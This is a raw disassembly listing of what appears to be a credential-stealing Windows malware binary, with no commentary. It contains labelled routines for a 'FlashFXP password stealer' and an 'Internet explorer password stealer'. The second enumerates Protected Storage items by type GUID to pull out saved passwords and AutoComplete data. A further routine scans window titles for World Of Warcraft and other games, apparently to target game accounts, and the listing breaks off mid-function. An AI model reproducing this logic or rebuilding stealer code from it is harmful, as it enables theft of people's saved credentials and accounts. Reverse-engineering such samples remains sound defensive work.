push eax
lea eax, [ebp+var_3B4]
push eax
push [ebp+var_334]
push offset dword_41D240
lea eax, [ebp+var_328]
push eax
call sub_40D53F
add esp, 20h
mov eax, [ebp+var_32C]
cmp dword ptr [eax+4], 0
jz short loc_414E13
push [ebp+var_3BC]
call sub_416B4C ; free
pop ecx
jmp loc_414EA6
; ---------------------------------------------------------------------------
loc_414E13: ; CODE XREF: sub_414A1E+213�j
; sub_414A1E+22E�j ...
mov eax, [ebp+var_184]
inc eax
mov [ebp+var_184], eax
mov eax, [ebp+var_5DC]
mov [ebp+var_3B8], eax
cmp [ebp+var_3B8], 0
jnz short loc_414E37
jmp short loc_414E4B
; ---------------------------------------------------------------------------
loc_414E37: ; CODE XREF: sub_414A1E+415�j
mov eax, [ebp+var_3B8]
add eax, 4
mov [ebp+var_3B8], eax
jmp loc_414BA6
; ---------------------------------------------------------------------------
loc_414E4B: ; CODE XREF: sub_414A1E+37E�j
; sub_414A1E+417�j
push [ebp+var_3BC]
call sub_416B4C ; free
pop ecx
loc_414E57: ; CODE XREF: sub_414A1E:loc_414EA6�j
mov al, [ebp+var_330]
mov [ebp+var_190], al
push 3E8h
call dword_41709C ; Sleep
push [ebp+var_184]
push [ebp+var_334]
mov eax, [ebp+var_32C]
push dword ptr [eax]
push offset unk_41D204
lea eax, [ebp+var_328]
push eax
call sub_40D53F
add esp, 14h
loc_414E96: ; CODE XREF: sub_414A1E:loc_414EA8�j
; sub_414A1E:loc_414EAA�j
push [ebp+var_32C]
call sub_409763
pop ecx
xor eax, eax
jmp short locret_414EAC
; ---------------------------------------------------------------------------
loc_414EA6: ; CODE XREF: sub_414A1E+3F0�j
jmp short loc_414E57
; ---------------------------------------------------------------------------
loc_414EA8: ; CODE XREF: sub_414A1E+140�j
jmp short loc_414E96
; ---------------------------------------------------------------------------
loc_414EAA: ; CODE XREF: sub_414A1E+AC�j
jmp short loc_414E96
; ---------------------------------------------------------------------------
locret_414EAC: ; CODE XREF: sub_414A1E+48�j
; sub_414A1E+486�j
leave
retn 4
sub_414A1E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_414EB0 proc near ; CODE XREF: sub_40A9CF+769�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
push 1A7h
call sub_416B46 ; malloc
pop ecx
mov [ebp+var_4], eax
cmp [ebp+var_4], 0
jnz short loc_414ECA
jmp short locret_414EF2
; ---------------------------------------------------------------------------
loc_414ECA: ; CODE XREF: sub_414EB0+16�j
push [ebp+arg_0]
mov eax, [ebp+var_4]
add eax, 4
push eax
call sub_405F67
pop ecx
pop ecx
push offset aFlashfxpPasswo ; "FlashFXP password stealer"
push 0
push [ebp+var_4]
push offset sub_414A1E
call sub_4095A4
add esp, 10h
locret_414EF2: ; CODE XREF: sub_414EB0+18�j
leave
retn
sub_414EB0 endp
; =============== S U B R O U T I N E =======================================
sub_414EF4 proc near ; DATA XREF: sub_415AF0+40�o
mov eax, offset loc_416FDD
call sub_416E10
sub esp, 0FFCh
push esi
push edi
push 1A7h
push dword ptr [ebp+8]
lea eax, [ebp-0BF0h]
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
push dword ptr [ebp+8]
call sub_416B4C ; free
pop ecx
and dword ptr [ebp-0A00h], 0
and dword ptr [ebp-4], 0
cmp dword ptr [ebp-0A00h], 0
jz short loc_414F4C
mov eax, [ebp-0A00h]
mov ecx, [ebp-0A00h]
mov ecx, [ecx]
push eax
call dword ptr [ecx+8]
loc_414F4C: ; CODE XREF: sub_414EF4+44�j
and dword ptr [ebp-0A00h], 0
push 0
push 0
push 0
lea eax, [ebp-0A00h]
push eax
call dword_41DE50
mov [ebp-0DF4h], eax
cmp dword ptr [ebp-0DF4h], 0
jge short loc_414FB2
push dword ptr [ebp-0BF0h]
call sub_409763
pop ecx
and dword ptr [ebp-0FD0h], 0
or dword ptr [ebp-4], 0FFFFFFFFh
cmp dword ptr [ebp-0A00h], 0
jz short loc_414FA7
mov eax, [ebp-0A00h]
mov ecx, [ebp-0A00h]
mov ecx, [ecx]
push eax
call dword ptr [ecx+8]
loc_414FA7: ; CODE XREF: sub_414EF4+9F�j
mov eax, [ebp-0FD0h]
jmp loc_415AE0
; ---------------------------------------------------------------------------
loc_414FB2: ; CODE XREF: sub_414EF4+7F�j
and dword ptr [ebp-10h], 0
mov byte ptr [ebp-4], 1
cmp dword ptr [ebp-10h], 0
jz short loc_414FCC
mov eax, [ebp-10h]
mov ecx, [ebp-10h]
mov ecx, [ecx]
push eax
call dword ptr [ecx+8]
loc_414FCC: ; CODE XREF: sub_414EF4+CA�j
and dword ptr [ebp-10h], 0
cmp dword ptr [ebp-0A00h], 0
jnz short loc_414FE3
push 80004003h
call sub_416E40
loc_414FE3: ; CODE XREF: sub_414EF4+E3�j
mov eax, [ebp-0A00h]
mov [ebp-0FE0h], eax
lea eax, [ebp-10h]
push eax
push 0
push 0
mov eax, [ebp-0FE0h]
mov eax, [eax]
push dword ptr [ebp-0FE0h]
call dword ptr [eax+38h]
mov [ebp-0FDCh], eax
cmp dword ptr [ebp-0FDCh], 0
jge short loc_41502D
push offset dword_41D570
push dword ptr [ebp-0FE0h]
push dword ptr [ebp-0FDCh]
call sub_416E4E
loc_41502D: ; CODE XREF: sub_414EF4+121�j
mov eax, [ebp-0FDCh]
mov [ebp-0DF4h], eax
cmp dword ptr [ebp-0DF4h], 0
jge short loc_415095
push dword ptr [ebp-0BF0h]
call sub_409763
pop ecx
and dword ptr [ebp-0FD4h], 0
and byte ptr [ebp-4], 0
cmp dword ptr [ebp-10h], 0
jz short loc_41506B
mov eax, [ebp-10h]
mov ecx, [ebp-10h]
mov ecx, [ecx]
push eax
call dword ptr [ecx+8]
loc_41506B: ; CODE XREF: sub_414EF4+169�j
or dword ptr [ebp-4], 0FFFFFFFFh
cmp dword ptr [ebp-0A00h], 0
jz short loc_41508A
mov eax, [ebp-0A00h]
mov ecx, [ebp-0A00h]
mov ecx, [ecx]
push eax
call dword ptr [ecx+8]
loc_41508A: ; CODE XREF: sub_414EF4+182�j
mov eax, [ebp-0FD4h]
jmp loc_415AE0
; ---------------------------------------------------------------------------
loc_415095: ; CODE XREF: sub_414EF4+14C�j
mov eax, [ebp-0BF0h]
push dword ptr [eax]
push offset unk_41D53C
lea eax, [ebp-0BECh]
push eax
call sub_40D53F
add esp, 0Ch
and dword ptr [ebp-214h], 0
mov al, [ebp-0A54h]
mov [ebp-0A14h], al
and byte ptr [ebp-0A54h], 0
loc_4150CB: ; CODE XREF: sub_414EF4:loc_415A54�j
cmp dword ptr [ebp-10h], 0
jnz short loc_4150DB
push 80004003h
call sub_416E40
loc_4150DB: ; CODE XREF: sub_414EF4+1DB�j
push 0
lea eax, [ebp-0A10h]
push eax
push 1
mov eax, [ebp-10h]
mov [ebp-1000h], eax
mov eax, [ebp-1000h]
mov eax, [eax]
push dword ptr [ebp-1000h]
call dword ptr [eax+0Ch]
test eax, eax
jnz loc_415A59
mov eax, [ebp-0BF0h]
cmp dword ptr [eax+4], 0
jz short loc_415119
jmp loc_415A59
; ---------------------------------------------------------------------------
loc_415119: ; CODE XREF: sub_414EF4+21E�j
sub esp, 10h
lea esi, [ebp-0A10h]
mov edi, esp
movsd
movsd
movsd
movsd
push offset asc_41D538 ; "%x"
lea eax, [ebp-0A48h]
push eax
call dword_4171E0 ; wsprintfA
add esp, 18h
and dword ptr [ebp-0DF8h], 0
mov byte ptr [ebp-4], 2
cmp dword ptr [ebp-0DF8h], 0
jz short loc_415163
mov eax, [ebp-0DF8h]
mov ecx, [ebp-0DF8h]
mov ecx, [ecx]
push eax
call dword ptr [ecx+8]
loc_415163: ; CODE XREF: sub_414EF4+25B�j
and dword ptr [ebp-0DF8h], 0
cmp dword ptr [ebp-0A00h], 0
jnz short loc_41517D
push 80004003h
call sub_416E40
loc_41517D: ; CODE XREF: sub_414EF4+27D�j
mov eax, [ebp-0A00h]
mov [ebp-0FE8h], eax
lea eax, [ebp-0DF8h]
push eax
push 0
lea eax, [ebp-0A10h]
push eax
push 0
mov eax, [ebp-0FE8h]
mov eax, [eax]
push dword ptr [ebp-0FE8h]
call dword ptr [eax+3Ch]
mov [ebp-0FE4h], eax
cmp dword ptr [ebp-0FE4h], 0
jge short loc_4151D1
push offset dword_41D570
push dword ptr [ebp-0FE8h]
push dword ptr [ebp-0FE4h]
call sub_416E4E
loc_4151D1: ; CODE XREF: sub_414EF4+2C5�j
mov eax, [ebp-0FE4h]
mov [ebp-0DF4h], eax
loc_4151DD: ; CODE XREF: sub_414EF4:loc_415A30�j
cmp dword ptr [ebp-0DF8h], 0
jnz short loc_4151F0
push 80004003h
call sub_416E40
loc_4151F0: ; CODE XREF: sub_414EF4+2F0�j
push 0
lea eax, [ebp-0E08h]
push eax
push 1
mov eax, [ebp-0DF8h]
mov [ebp-1004h], eax
mov eax, [ebp-1004h]
mov eax, [eax]
push dword ptr [ebp-1004h]
call dword ptr [eax+0Ch]
test eax, eax
jnz loc_415A35
and dword ptr [ebp-0E14h], 0
mov byte ptr [ebp-4], 3
cmp dword ptr [ebp-0E14h], 0
jz short loc_415246
mov eax, [ebp-0E14h]
mov ecx, [ebp-0E14h]
mov ecx, [ecx]
push eax
call dword ptr [ecx+8]
loc_415246: ; CODE XREF: sub_414EF4+33E�j
and dword ptr [ebp-0E14h], 0
cmp dword ptr [ebp-0A00h], 0
jnz short loc_415260
push 80004003h
call sub_416E40
loc_415260: ; CODE XREF: sub_414EF4+360�j
mov eax, [ebp-0A00h]
mov [ebp-0FF0h], eax
lea eax, [ebp-0E14h]
push eax
push 0
lea eax, [ebp-0E08h]
push eax
lea eax, [ebp-0A10h]
push eax
push 0
mov eax, [ebp-0FF0h]
mov eax, [eax]
push dword ptr [ebp-0FF0h]
call dword ptr [eax+54h]
mov [ebp-0FECh], eax
cmp dword ptr [ebp-0FECh], 0
jge short loc_4152BB
push offset dword_41D570
push dword ptr [ebp-0FF0h]
push dword ptr [ebp-0FECh]
call sub_416E4E
loc_4152BB: ; CODE XREF: sub_414EF4+3AF�j
mov eax, [ebp-0FECh]
mov [ebp-0E10h], eax
loc_4152C7: ; CODE XREF: sub_414EF4+B18�j
cmp dword ptr [ebp-0E14h], 0
jnz short loc_4152DA
push 80004003h
call sub_416E40
loc_4152DA: ; CODE XREF: sub_414EF4+3DA�j
push 0
lea eax, [ebp-0E0Ch]
push eax
push 1
mov eax, [ebp-0E14h]
mov [ebp-1008h], eax
mov eax, [ebp-1008h]
mov eax, [eax]
push dword ptr [ebp-1008h]
call dword ptr [eax+0Ch]
test eax, eax
jnz loc_415A11
push dword ptr [ebp-0E0Ch]
push offset aWs ; "%ws"
lea eax, [ebp-210h]
push eax
call dword_4171E0 ; wsprintfA
add esp, 0Ch
and dword ptr [ebp-0E18h], 0
and dword ptr [ebp-0EE8h], 0
and dword ptr [ebp-0EE4h], 0
cmp dword ptr [ebp-0A00h], 0
jnz short loc_41534D
push 80004003h
call sub_416E40
loc_41534D: ; CODE XREF: sub_414EF4+44D�j
mov eax, [ebp-0E0Ch]
loc_415353: ; DATA XREF: .data:off_419100�o
mov [ebp-0FFCh], eax
mov eax, [ebp-0A00h]
mov [ebp-0FF8h], eax
push 0
push dword ptr [ebp-0EE4h]
lea eax, [ebp-0EE8h]
push eax
lea eax, [ebp-0E18h]
push eax
push dword ptr [ebp-0FFCh]
lea eax, [ebp-0E08h]
push eax
lea eax, [ebp-0A10h]
push eax
push 0
mov eax, [ebp-0FF8h]
mov eax, [eax]
push dword ptr [ebp-0FF8h]
call dword ptr [eax+44h]
mov [ebp-0FF4h], eax
cmp dword ptr [ebp-0FF4h], 0
jge short loc_4153C7
push offset dword_41D570
push dword ptr [ebp-0FF8h]
push dword ptr [ebp-0FF4h]
call sub_416E4E
loc_4153C7: ; CODE XREF: sub_414EF4+4BB�j
mov eax, [ebp-0FF4h]
mov [ebp-0E10h], eax
push dword ptr [ebp-0EE8h]
call sub_416B40 ; strlen
pop ecx
mov ecx, [ebp-0E18h]
dec ecx
cmp eax, ecx
jnb loc_415477
and dword ptr [ebp-0EECh], 0
and dword ptr [ebp-0EF0h], 0
jmp short loc_41540C
; ---------------------------------------------------------------------------
loc_4153FE: ; CODE XREF: sub_414EF4+571�j
mov eax, [ebp-0EF0h]
inc eax
inc eax
mov [ebp-0EF0h], eax
loc_41540C: ; CODE XREF: sub_414EF4+508�j
mov eax, [ebp-0EF0h]
cmp eax, [ebp-0E18h]
jnb short loc_415467
mov eax, [ebp-0EE8h]
add eax, [ebp-0EF0h]
movzx eax, byte ptr [eax]
test eax, eax
jnz short loc_41543D
mov eax, [ebp-0EECh]
mov byte ptr [ebp+eax-9FCh], 2Ch
jmp short loc_415458
; ---------------------------------------------------------------------------
loc_41543D: ; CODE XREF: sub_414EF4+537�j
mov eax, [ebp-0EE8h]
add eax, [ebp-0EF0h]
mov ecx, [ebp-0EECh]
mov al, [eax]
mov [ebp+ecx-9FCh], al
loc_415458: ; CODE XREF: sub_414EF4+547�j
mov eax, [ebp-0EECh]
inc eax
mov [ebp-0EECh], eax
jmp short loc_4153FE
; ---------------------------------------------------------------------------
loc_415467: ; CODE XREF: sub_414EF4+524�j
mov eax, [ebp-0EECh]
and byte ptr [ebp+eax-9FDh], 0
jmp short loc_415492
; ---------------------------------------------------------------------------
loc_415477: ; CODE XREF: sub_414EF4+4F4�j
push dword ptr [ebp-0EE8h]
push offset dword_418B64
lea eax, [ebp-9FCh]
push eax
call dword_4171E0 ; wsprintfA
add esp, 0Ch
loc_415492: ; CODE XREF: sub_414EF4+581�j
push offset byte_41DE00
lea eax, [ebp-7FCh]
push eax
call dword_4170FC ; lstrcpy
push offset byte_41DE00
lea eax, [ebp-0DF0h]
push eax
call dword_4170FC ; lstrcpy
push offset a220d5cc1 ; "220d5cc1"
lea eax, [ebp-0A48h]
push eax
call dword_417108 ; lstrcmp
test eax, eax
jnz short loc_41550C
mov eax, [ebp-214h]
inc eax
mov [ebp-214h], eax
movsx eax, byte ptr [ebp-0A57h]
test eax, eax
jnz short loc_41550C
lea eax, [ebp-9FCh]
push eax
lea eax, [ebp-210h]
push eax
push dword ptr [ebp-214h]
push offset dword_41D4E8
lea eax, [ebp-0BECh]
push eax
call sub_40D53F
add esp, 14h
loc_41550C: ; CODE XREF: sub_414EF4+5D6�j
; sub_414EF4+5EE�j
push offset a5e7e8100 ; "5e7e8100"
lea eax, [ebp-0A48h]
push eax
call dword_417108 ; lstrcmp
test eax, eax
jnz loc_4155CE
push offset byte_41DE00
lea eax, [ebp-0EE0h]
push eax
call dword_4170FC ; lstrcpy
push offset asc_4184FC ; ":"
lea eax, [ebp-9FCh]
push eax
call sub_416BA8 ; strstr
pop ecx
pop ecx
test eax, eax
jz short loc_415587
push offset asc_4184FC ; ":"
lea eax, [ebp-9FCh]
push eax
call sub_416BA8 ; strstr
pop ecx
pop ecx
inc eax
push eax
lea eax, [ebp-0EE0h]
push eax
call dword_4170FC ; lstrcpy
push offset asc_4184FC ; ":"
lea eax, [ebp-9FCh]
push eax
call sub_416BA8 ; strstr
pop ecx
pop ecx
and byte ptr [eax], 0
loc_415587: ; CODE XREF: sub_414EF4+659�j
mov eax, [ebp-214h]
inc eax
mov [ebp-214h], eax
push 3E8h
call dword_41709C ; Sleep
lea eax, [ebp-0EE0h]
push eax
lea eax, [ebp-9FCh]
push eax
lea eax, [ebp-210h]
push eax
push dword ptr [ebp-214h]
push offset dword_41D484
lea eax, [ebp-0BECh]
push eax
call sub_40D53F
add esp, 18h
loc_4155CE: ; CODE XREF: sub_414EF4+62C�j
push offset aB9819c52 ; "b9819c52"
lea eax, [ebp-0A48h]
push eax
call dword_417108 ; lstrcmp
test eax, eax
jnz loc_415842
and dword ptr [ebp-0FC8h], 0
mov dword ptr [ebp-0EFCh], 1
and dword ptr [ebp-0FCCh], 0
jmp short loc_415610
; ---------------------------------------------------------------------------
loc_415602: ; CODE XREF: sub_414EF4:loc_4156CF�j
mov eax, [ebp-0FCCh]
inc eax
inc eax
mov [ebp-0FCCh], eax
loc_415610: ; CODE XREF: sub_414EF4+70C�j
mov eax, [ebp-0FCCh]
cmp eax, [ebp-0E18h]
jnb loc_4156D4
mov eax, [ebp-0EE8h]
add eax, [ebp-0FCCh]
movzx eax, byte ptr [eax]
test eax, eax
jnz short loc_415652
mov eax, [ebp-0FC8h]
mov byte ptr [ebp+eax-9FCh], 2Ch
mov eax, [ebp-0FC8h]
inc eax
mov [ebp-0FC8h], eax
jmp short loc_4156CF
; ---------------------------------------------------------------------------
loc_415652: ; CODE XREF: sub_414EF4+73F�j
mov eax, [ebp-0EE8h]
add eax, [ebp-0FCCh]
mov al, [eax]
push eax
call dword_4171DC ; IsCharAlphaNumericA
test eax, eax
jnz short loc_4156A7
mov eax, [ebp-0EE8h]
add eax, [ebp-0FCCh]
movzx eax, byte ptr [eax]
cmp eax, 40h
jz short loc_4156A7
mov eax, [ebp-0EE8h]
add eax, [ebp-0FCCh]
movzx eax, byte ptr [eax]
cmp eax, 2Eh
jz short loc_4156A7
mov eax, [ebp-0EE8h]
add eax, [ebp-0FCCh]
movzx eax, byte ptr [eax]
cmp eax, 5Fh
jnz short loc_4156CF
loc_4156A7: ; CODE XREF: sub_414EF4+775�j
; sub_414EF4+789�j ...
mov eax, [ebp-0EE8h]
add eax, [ebp-0FCCh]
mov ecx, [ebp-0FC8h]
mov al, [eax]
mov [ebp+ecx-9FCh], al
mov eax, [ebp-0FC8h]
inc eax
mov [ebp-0FC8h], eax
loc_4156CF: ; CODE XREF: sub_414EF4+75C�j
; sub_414EF4+7B1�j
jmp loc_415602
; ---------------------------------------------------------------------------
loc_4156D4: ; CODE XREF: sub_414EF4+728�j
mov eax, [ebp-0FC8h]
and byte ptr [ebp+eax-9FDh], 0
lea eax, [ebp-9FAh]
mov [ebp-0EF4h], eax
and dword ptr [ebp-0EF8h], 0
jmp short loc_415704
; ---------------------------------------------------------------------------
loc_4156F7: ; CODE XREF: sub_414EF4:loc_41583D�j
mov eax, [ebp-0EF8h]
inc eax
mov [ebp-0EF8h], eax
loc_415704: ; CODE XREF: sub_414EF4+801�j
mov eax, [ebp-0EE8h]
movzx eax, byte ptr [eax+4]
cmp [ebp-0EF8h], eax
jge loc_415842
mov eax, [ebp-0EF4h]
inc eax
push eax
lea eax, [ebp-0FC4h]
push eax
call dword_4170FC ; lstrcpy
push offset dword_41D474
lea eax, [ebp-0FC4h]
push eax
call sub_416BA8 ; strstr
pop ecx
pop ecx
test eax, eax
jz short loc_41575C
push offset dword_41D474
lea eax, [ebp-0FC4h]
push eax
call sub_416BA8 ; strstr
pop ecx
pop ecx
and byte ptr [eax], 0
loc_41575C: ; CODE XREF: sub_414EF4+850�j
push offset dword_41D474
mov eax, [ebp-0EF4h]
inc eax
push eax
call sub_416BA8 ; strstr
pop ecx
pop ecx
test eax, eax
jz short loc_415798
push offset dword_41D474
mov eax, [ebp-0EF4h]
inc eax
push eax
call sub_416BA8 ; strstr
pop ecx
pop ecx
inc eax
inc eax
push eax
lea eax, [ebp-0F60h]
push eax
call dword_4170FC ; lstrcpy
loc_415798: ; CODE XREF: sub_414EF4+87E�j
push offset dword_41D474
lea eax, [ebp-0F60h]
push eax
call sub_416BA8 ; strstr
pop ecx
pop ecx
test eax, eax
jz short loc_4157C5
push offset dword_41D474
lea eax, [ebp-0F60h]
push eax
call sub_416BA8 ; strstr
pop ecx
pop ecx
and byte ptr [eax], 0
loc_4157C5: ; CODE XREF: sub_414EF4+8B9�j
push offset dword_41D474
mov eax, [ebp-0EF4h]
inc eax
push eax
call sub_416BA8 ; strstr
pop ecx
pop ecx
mov esi, eax
lea eax, [ebp-0F60h]
push eax
call dword_41703C ; lstrlen
lea eax, [esi+eax+9]
mov [ebp-0EF4h], eax
mov eax, [ebp-214h]
inc eax
mov [ebp-214h], eax
push 3E8h
call dword_41709C ; Sleep
movsx eax, byte ptr [ebp-0A57h]
test eax, eax
jnz short loc_41583D
lea eax, [ebp-0F60h]
push eax
lea eax, [ebp-0FC4h]
push eax
push dword ptr [ebp-214h]
push offset dword_41D434
lea eax, [ebp-0BECh]
push eax
call sub_40D53F
add esp, 14h
loc_41583D: ; CODE XREF: sub_414EF4+91F�j
jmp loc_4156F7
; ---------------------------------------------------------------------------
loc_415842: ; CODE XREF: sub_414EF4+6EE�j
; sub_414EF4+820�j
push offset aE161255a ; "e161255a"
lea eax, [ebp-0A48h]
push eax
call dword_417108 ; lstrcmp
test eax, eax
jnz loc_4159E0
push offset aStringindex ; "StringIndex"
lea eax, [ebp-210h]
push eax
call sub_416BA8 ; strstr
pop ecx
pop ecx
test eax, eax
jnz loc_4159E0
push offset dword_41D414
lea eax, [ebp-210h]
push eax
call sub_416BA8 ; strstr
pop ecx
pop ecx
test eax, eax
jz short loc_4158A4
push offset dword_41D414
lea eax, [ebp-210h]
push eax
call sub_416BA8 ; strstr
pop ecx
pop ecx
and byte ptr [eax], 0
loc_4158A4: ; CODE XREF: sub_414EF4+998�j
push 8
lea eax, [ebp-210h]
push eax
lea eax, [ebp-0EE0h]
push eax
call dword_417100 ; lstrcpyn
push offset dword_41D40C
lea eax, [ebp-0EE0h]
push eax
call sub_416BA8 ; strstr
pop ecx
pop ecx
test eax, eax
jnz short loc_415938
push offset dword_41D404
lea eax, [ebp-0EE0h]
push eax
call sub_416BA8 ; strstr
pop ecx
pop ecx
test eax, eax
jnz short loc_415938
mov eax, [ebp-214h]
inc eax
mov [ebp-214h], eax
push 3E8h
call dword_41709C ; Sleep
movsx eax, byte ptr [ebp-0A57h]
test eax, eax
jnz short loc_415933
lea eax, [ebp-9FCh]
push eax
lea eax, [ebp-210h]
push eax
push dword ptr [ebp-214h]
push offset dword_41D3BC
lea eax, [ebp-0BECh]
push eax
call sub_40D53F
add esp, 14h
loc_415933: ; CODE XREF: sub_414EF4+A15�j
jmp loc_4159E0
; ---------------------------------------------------------------------------
loc_415938: ; CODE XREF: sub_414EF4+9DB�j
; sub_414EF4+9F2�j
push offset byte_41DE00
lea eax, [ebp-0EE0h]
push eax
call dword_4170FC ; lstrcpy
push offset dword_41D474
lea eax, [ebp-9FCh]
push eax
call sub_416BA8 ; strstr
pop ecx
pop ecx
test eax, eax
jz short loc_415999
push offset dword_41D474
lea eax, [ebp-9FCh]
push eax
call sub_416BA8 ; strstr
pop ecx
pop ecx
inc eax
push eax
lea eax, [ebp-0EE0h]
push eax
call dword_4170FC ; lstrcpy
push offset dword_41D474
lea eax, [ebp-9FCh]
push eax
call sub_416BA8 ; strstr
pop ecx
pop ecx
and byte ptr [eax], 0
loc_415999: ; CODE XREF: sub_414EF4+A6B�j
mov eax, [ebp-214h]
inc eax
mov [ebp-214h], eax
push 3E8h
call dword_41709C ; Sleep
lea eax, [ebp-0EE0h]
push eax
lea eax, [ebp-9FCh]
push eax
lea eax, [ebp-210h]
push eax
push dword ptr [ebp-214h]
push offset dword_41D360
lea eax, [ebp-0BECh]
push eax
call sub_40D53F
add esp, 18h
loc_4159E0: ; CODE XREF: sub_414EF4+962�j
; sub_414EF4+97D�j ...
push 200h
push 0
lea eax, [ebp-210h]
push eax
call sub_416B6A ; memset
add esp, 0Ch
push 200h
push 0
lea eax, [ebp-9FCh]
push eax
call sub_416B6A ; memset
add esp, 0Ch
jmp loc_4152C7
; ---------------------------------------------------------------------------
loc_415A11: ; CODE XREF: sub_414EF4+410�j
mov byte ptr [ebp-4], 2
cmp dword ptr [ebp-0E14h], 0
jz short loc_415A30
mov eax, [ebp-0E14h]
mov ecx, [ebp-0E14h]
mov ecx, [ecx]
push eax
call dword ptr [ecx+8]
loc_415A30: ; CODE XREF: sub_414EF4+B28�j
jmp loc_4151DD
; ---------------------------------------------------------------------------
loc_415A35: ; CODE XREF: sub_414EF4+326�j
mov byte ptr [ebp-4], 1
cmp dword ptr [ebp-0DF8h], 0
jz short loc_415A54
mov eax, [ebp-0DF8h]
mov ecx, [ebp-0DF8h]
mov ecx, [ecx]
push eax
call dword ptr [ecx+8]
loc_415A54: ; CODE XREF: sub_414EF4+B4C�j
jmp loc_4150CB
; ---------------------------------------------------------------------------
loc_415A59: ; CODE XREF: sub_414EF4+20E�j
; sub_414EF4+220�j
mov al, [ebp-0A14h]
mov [ebp-0A54h], al
push 3E8h
call dword_41709C ; Sleep
push dword ptr [ebp-214h]
mov eax, [ebp-0BF0h]
push dword ptr [eax]
push offset unk_41D324
lea eax, [ebp-0BECh]
push eax
call sub_40D53F
add esp, 10h
push dword ptr [ebp-0BF0h]
call sub_409763
pop ecx
and dword ptr [ebp-0FD8h], 0
and byte ptr [ebp-4], 0
cmp dword ptr [ebp-10h], 0
jz short loc_415ABB
mov eax, [ebp-10h]
mov ecx, [ebp-10h]
mov ecx, [ecx]
push eax
call dword ptr [ecx+8]
loc_415ABB: ; CODE XREF: sub_414EF4+BB9�j
or dword ptr [ebp-4], 0FFFFFFFFh
cmp dword ptr [ebp-0A00h], 0
jz short loc_415ADA
mov eax, [ebp-0A00h]
mov ecx, [ebp-0A00h]
mov ecx, [ecx]
push eax
call dword ptr [ecx+8]
loc_415ADA: ; CODE XREF: sub_414EF4+BD2�j
mov eax, [ebp-0FD8h]
loc_415AE0: ; CODE XREF: sub_414EF4+B9�j
; sub_414EF4+19C�j
mov ecx, [ebp-0Ch]
mov large fs:0, ecx
pop edi
pop esi
leave
retn 4
sub_414EF4 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_415AF0 proc near ; CODE XREF: sub_40A9CF+7F�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
cmp dword_41DE50, 0
jnz short loc_415AFF
jmp short locret_415B3D
; ---------------------------------------------------------------------------
loc_415AFF: ; CODE XREF: sub_415AF0+B�j
push 1A7h
call sub_416B46 ; malloc
pop ecx
mov [ebp+var_4], eax
cmp [ebp+var_4], 0
jnz short loc_415B15
jmp short locret_415B3D
; ---------------------------------------------------------------------------
loc_415B15: ; CODE XREF: sub_415AF0+21�j
push [ebp+arg_0]
mov eax, [ebp+var_4]
add eax, 4
push eax
call sub_405F67
pop ecx
pop ecx
push offset aInternetExplor ; "Internet explorer password stealer"
push 0
push [ebp+var_4]
push offset sub_414EF4
call sub_4095A4
add esp, 10h
locret_415B3D: ; CODE XREF: sub_415AF0+D�j
; sub_415AF0+23�j
leave
retn
sub_415AF0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_415B3F proc near ; CODE XREF: .data:00416FB6�p
; .data:00416FBF�p ...
var_4 = dword ptr -4
push ebp
mov ebp, esp
push ecx
mov [ebp+var_4], ecx
mov eax, [ebp+var_4]
cmp dword ptr [eax], 0
jz short locret_415B5E
mov eax, [ebp+var_4]
mov eax, [eax]
mov ecx, [ebp+var_4]
mov ecx, [ecx]
mov ecx, [ecx]
push eax
call dword ptr [ecx+8]
locret_415B5E: ; CODE XREF: sub_415B3F+D�j
leave
retn
sub_415B3F endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_415B60 proc near ; DATA XREF: sub_415DFD+35�o
var_5D8 = dword ptr -5D8h
var_5D4 = dword ptr -5D4h
var_5D0 = dword ptr -5D0h
var_5CC = dword ptr -5CCh
var_5C8 = dword ptr -5C8h
var_5C4 = dword ptr -5C4h
var_5C0 = dword ptr -5C0h
var_5BC = dword ptr -5BCh
var_5B8 = dword ptr -5B8h
var_5B4 = byte ptr -5B4h
var_41C = byte ptr -41Ch
var_410 = dword ptr -410h
var_40C = dword ptr -40Ch
var_408 = dword ptr -408h
var_404 = dword ptr -404h
var_400 = byte ptr -400h
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 5D8h
push 1A7h
push [ebp+arg_0]
lea eax, [ebp+var_5B8]
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
push [ebp+arg_0]
call sub_416B4C ; free
pop ecx
and [ebp+var_5C4], 0
and [ebp+var_410], 0
and [ebp+var_40C], 0
and [ebp+var_408], 0
and [ebp+var_404], 0
and [ebp+var_5BC], 0
jmp short loc_415BC2
; ---------------------------------------------------------------------------
loc_415BB5: ; CODE XREF: sub_415B60:loc_415C50�j
mov eax, [ebp+var_5BC]
inc eax
mov [ebp+var_5BC], eax
loc_415BC2: ; CODE XREF: sub_415B60+53�j
cmp [ebp+var_5BC], 0FFFFh
jnb loc_415C55
push 400h
lea eax, [ebp+var_400]
push eax
push [ebp+var_5BC]
call dword_4171E4 ; GetWindowTextA
push 7
push offset aUnreal3 ; "Unreal3"
lea eax, [ebp+var_400]
push eax
call sub_416F80 ; _strnicmp
add esp, 0Ch
test eax, eax
jnz short loc_415C0E
mov [ebp+var_410], 1
loc_415C0E: ; CODE XREF: sub_415B60+A2�j
push offset aWorldOfWarcraf ; "World Of Warcraft"
lea eax, [ebp+var_400]
push eax
call sub_416DDE ; strcmp
pop ecx
pop ecx
test eax, eax
jnz short loc_415C2F
mov [ebp+var_408], 1
loc_415C2F: ; CODE XREF: sub_415B60+C3�j
push offset aConquer ; "[Conquer]"
lea eax, [ebp+var_400]
push eax
call sub_416DDE ; strcmp
pop ecx
pop ecx
test eax, eax
jnz short loc_415C50
mov [ebp+var_404], 1
loc_415C50: ; CODE XREF: sub_415B60+E4�j
jmp loc_415BB5
; ---------------------------------------------------------------------------
loc_415C55: ; CODE XREF: sub_415B60+6C�j
and [ebp+var_5C0], 0
lea eax, [ebp+var_5C0]
push eax
push 20019h
push 0
push offset aSoftwareMicr_0 ; "SOFTWARE\\Microsoft\\VisualStudio\\6.0\\Set"...
push 80000002h
call dword_417008 ; RegOpenKeyExA
test eax, eax
jnz short loc_415C88
mov [ebp+var_5C4], 1
